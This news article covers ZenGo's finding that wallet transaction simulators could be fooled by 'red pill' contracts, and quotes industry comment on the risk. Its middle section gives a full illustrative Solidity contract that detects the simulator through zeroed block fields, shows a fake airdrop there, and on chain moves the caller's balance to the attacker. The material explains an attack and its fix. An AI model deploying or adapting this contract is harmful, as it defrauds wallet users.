Transaction simulation exploitation.
Mar 22, 2023

Cryptocurrency security vulnerabilities have since been patched.


Researchers at crypto wallet provider ZenGo discovered vulnerabilities in leading transaction simulation solutions.

Malware could detect sandbox emulations.

Transaction simulations are sandbox emulations run by a wallet to “evaluate the potential outcome of the intended transaction” before it is signed and broadcast, primarily to combat theft and scams. The researchers found that a malicious contract could detect that it was running inside such a sandbox, behave benignly there, and then “reveal its true malicious nature only when actually executed in a real environment.” They dubbed this a “red pill attack,” a reference to the code recognizing that its surroundings are simulated and acting accordingly.
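The following contract is an added illustration of the attack pattern described above; it is not code from ZenGo's research or from any of the affected vendors. The article does not say which environment signals the researchers used, so the three checks in `looksSimulated()` (a zero `block.coinbase`, a zero `block.timestamp`, a zero `block.basefee`) are assumed examples of values a crude emulator might leave unset and that a real mainnet block never has.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

/// Illustrative "red pill" token: shows one behavior to a wallet's transaction
/// simulator and a different one once the transaction is actually mined.
/// The detection heuristics are ASSUMPTIONS for this example, not the ones
/// reported in the article.
contract RedPillToken {
    mapping(address => uint256) public balanceOf;
    address public immutable attacker;

    constructor() {
        attacker = msg.sender;
        balanceOf[msg.sender] = 1_000_000 ether;
    }

    /// Heuristic sandbox detection. On a real chain the block producer
    /// address, timestamp and base fee are all non-zero; a simulator that
    /// forgets to populate them gives the contract a tell.
    function looksSimulated() public view returns (bool) {
        return block.coinbase == address(0)
            || block.timestamp == 0
            || block.basefee == 0;
    }

    /// What the user is shown: a small airdrop credited to the caller.
    /// What happens on chain: the caller's whole balance moves to the attacker.
    function claimAirdrop() external {
        if (looksSimulated()) {
            // Benign path, reported by the simulator as "+100 tokens".
            balanceOf[msg.sender] += 100 ether;
            return;
        }
        // Malicious path, only reachable when the environment looks real.
        uint256 bal = balanceOf[msg.sender];
        balanceOf[msg.sender] = 0;
        balanceOf[attacker] += bal;
    }
}
```

The divergence is entirely in the contract's control flow; nothing is hidden from the simulator except the values it failed to make realistic. A simulator that fills `block.coinbase`, `block.timestamp` and `block.basefee` (and any other EVM environment opcodes) with values indistinguishable from a live block leaves this contract with nothing to key on, which is the kind of implementation fix one would expect the vendors to have made in response to the report.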

The researchers note that “all vendors were very receptive to our reports, and most of them were quick to fix their faulty implementations.” Some vendors, including Coinbase, awarded ZenGo bug bounties.

Industry comment.

Jeff Williams, co-founder and CTO at Contrast Security, offered the following observations:

“The problems associated with ‘red pill’ utilization in software aren’t new. Volkswagen got in trouble when their car software detected that emissions were being EPA tested and adjusted their engine performance to pass the test. When running without the ‘red pill’ settings, Volkswagen cars would output up to 40x the allowed emissions.

“There are an incalculable number of ways that software can detect the environment that it is running in. These include environment variables, IP address, configuration, performance characteristics, and data values just to name a few. Any of them could be used as a ‘red pill’ and allow the attacker to suppress their attacks until it can ensure it is in a production environment.

“The real question is what to do about it. I think it’s unlikely that security tools will be able to reliably detect when malware uses red pills, both because of the huge variety of signals as well as the legitimate need to detect test environments.”